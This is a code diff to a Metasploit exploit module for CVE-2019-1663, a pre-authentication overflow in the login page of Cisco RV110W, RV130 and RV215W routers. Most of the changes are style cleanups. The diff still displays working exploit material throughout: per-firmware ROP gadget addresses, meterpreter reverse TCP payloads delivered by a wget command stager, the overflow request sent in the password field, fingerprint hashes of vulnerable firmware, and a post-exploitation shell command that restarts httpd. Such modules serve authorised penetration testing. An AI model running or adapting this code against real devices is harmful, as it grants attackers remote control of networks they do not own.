@@ -53,9 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'Platform' => %w[linux],
-        'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],
         'SessionTypes' => %w[meterpreter],
-        'CmdStagerFlavor' => %w{wget},
+        'CmdStagerFlavor' => %w[wget],
         'Privileged' => true, # BusyBox
         'References' => [
           ['CVE', '2019-1663'],
@@ -68,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true,
           'RPORT' => 443,
           'CMDSTAGER::FLAVOR' => 'wget',
-          'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+          'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
         },
         'Targets' => [
           [
@@ -83,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -99,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -115,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -131,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -147,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -161,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget2' => 0x00041308, # mov r0, sp; blx r2;
               'Arch' => ARCH_ARMLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
               }
             },
           ],
@@ -177,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -193,7 +192,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -209,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -225,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -241,7 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -257,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -266,6 +265,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SERVICE_DOWN, ],
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         },
         'Compat' => {
           'Meterpreter' => {
@@ -273,7 +274,7 @@ class MetasploitModule < Msf::Exploit::Remote
               stdapi_sys_process_execute
             ]
           }
-        },
+        }
       )
     )
   end
@@ -314,25 +315,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_request(buffer)
-    begin
-      send_request_cgi({
-        'uri' => '/login.cgi',
-        'method' => 'POST',
-        'vars_post' => {
-          submit_button: "login",
-          submit_type: "",
-          gui_action: "",
-          wait_time: 0,
-          change_action: "",
-          enc: 1,
-          user: rand_text_alpha_lower(5),
-          pwd: buffer,
-          sel_lang: "EN"
-        }
-      })
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
-    end
+    send_request_cgi({
+      'uri' => '/login.cgi',
+      'method' => 'POST',
+      'vars_post' => {
+        submit_button: 'login',
+        submit_type: '',
+        gui_action: '',
+        wait_time: 0,
+        change_action: '',
+        enc: 1,
+        user: rand_text_alpha_lower(5),
+        pwd: buffer,
+        sel_lang: 'EN'
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
   end
 
   def check
@@ -342,57 +341,57 @@ class MetasploitModule < Msf::Exploit::Remote
     # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
 
     fingerprints = {
-      "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
-        "version" => "Cisco RV110W 1.1.0.9",
-        "status" => Exploit::CheckCode::Vulnerable
+      '69d906ddd59eb6755a7b9c4f46ea11cdaa47c706' => {
+        'version' => 'Cisco RV110W 1.1.0.9',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
-        "version" => "Cisco RV110W 1.2.0.9",
-        "status" => Exploit::CheckCode::Vulnerable
+      '8d3b677d870425198f7fae94d6cfe262551aa8bd' => {
+        'version' => 'Cisco RV110W 1.2.0.9',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "134ee643ec877641030211193a43cc5e93c96a06" => {
-        "version" => "Cisco RV110W 1.2.0.10",
-        "status" => Exploit::CheckCode::Vulnerable
+      '134ee643ec877641030211193a43cc5e93c96a06' => {
+        'version' => 'Cisco RV110W 1.2.0.10',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
-        "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
-        "status" => Exploit::CheckCode::Unknown
+      'e3b2ec9d099a3e3468f8437e5247723643ff830e' => {
+        'version' => 'Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)',
+        'status' => Exploit::CheckCode::Unknown
       },
-      "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
-        "version" => "Cisco RV130/RV130W 1.0.0.21",
-        "status" => Exploit::CheckCode::Vulnerable
+      '6b7b1e8097e8dda26db27a09b8176b9c32b349b3' => {
+        'version' => 'Cisco RV130/RV130W 1.0.0.21',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "9b1a87b752d11c5ba97dd80d6bae415532615266" => {
-        "version" => "Cisco RV130/RV130W 1.0.1.3",
-        "status" => Exploit::CheckCode::Vulnerable
+      '9b1a87b752d11c5ba97dd80d6bae415532615266' => {
+        'version' => 'Cisco RV130/RV130W 1.0.1.3',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "9b6399842ef69cf94409b65c4c61017c862b9d09" => {
-        "version" => "Cisco RV130/RV130W 1.0.2.7",
-        "status" => Exploit::CheckCode::Vulnerable
+      '9b6399842ef69cf94409b65c4c61017c862b9d09' => {
+        'version' => 'Cisco RV130/RV130W 1.0.2.7',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
-        "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
-        "status" => Exploit::CheckCode::Vulnerable
+      '8680ec6df4f8937acd3505a4dd36d40cb02c2bd6' => {
+        'version' => 'Cisco RV130/RV130W 1.0.3.14, 1.0.3.16',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "8c8e05de96810a02344d96588c09b21c491ede2d" => {
-        "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
-        "status" => Exploit::CheckCode::Unknown
+      '8c8e05de96810a02344d96588c09b21c491ede2d' => {
+        'version' => 'Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)',
+        'status' => Exploit::CheckCode::Unknown
       },
-      "2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
-        "version" => "Cisco RV215W 1.1.0.5",
-        "status" => Exploit::CheckCode::Vulnerable
+      '2f29a0dfa78063d643eb17388e27d3f804ff6765' => {
+        'version' => 'Cisco RV215W 1.1.0.5',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
-        "version" => "Cisco RV215W 1.1.0.6",
-        "status" => Exploit::CheckCode::Vulnerable
+      'e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f' => {
+        'version' => 'Cisco RV215W 1.1.0.6',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
-        "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
-        "status" => Exploit::CheckCode::Vulnerable
+      '7cc8fcce5949a68c31641c38255e7f6ed31ff4db' => {
+        'version' => 'Cisco RV215W 1.2.0.14 or 1.2.0.15',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "050d47ea944eaeadaec08945741e8e380f796741" => {
-        "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
-        "status" => Exploit::CheckCode::Unknown
+      '050d47ea944eaeadaec08945741e8e380f796741' => {
+        'version' => 'Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)',
+        'status' => Exploit::CheckCode::Unknown
       }
     }
 
@@ -402,10 +401,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(uri, 'lang_pack/EN.js')
     })
     if res && res.code == 200
-      fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
+      fingerprint = Digest::SHA1.hexdigest("#{res.body}")
       if fingerprints.key?(fingerprint)
-        print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
-        return fingerprints[fingerprint]["status"]
+        print_good("Successfully identified device: #{fingerprints[fingerprint]['version']}")
+        return fingerprints[fingerprint]['status']
       else
         print_status("Couldn't reliably fingerprint the target.")
       end
@@ -418,7 +417,7 @@ class MetasploitModule < Msf::Exploit::Remote
     execute_cmdstager
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     shellcode = prepare_shellcode(cmd.to_s)
     send_request(shellcode)
   end
@@ -427,8 +426,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # Given there is no process continuation here, the httpd server will stop
     # functioning properly and we need to take care of proper restart
     # ourselves.
-    print_status("Reloading httpd service")
-    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    print_status('Reloading httpd service')
+    reload_httpd_service = 'killall httpd && cd /www && httpd && httpd -S'
     if session.type.to_s.eql? 'meterpreter'
       session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
       session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
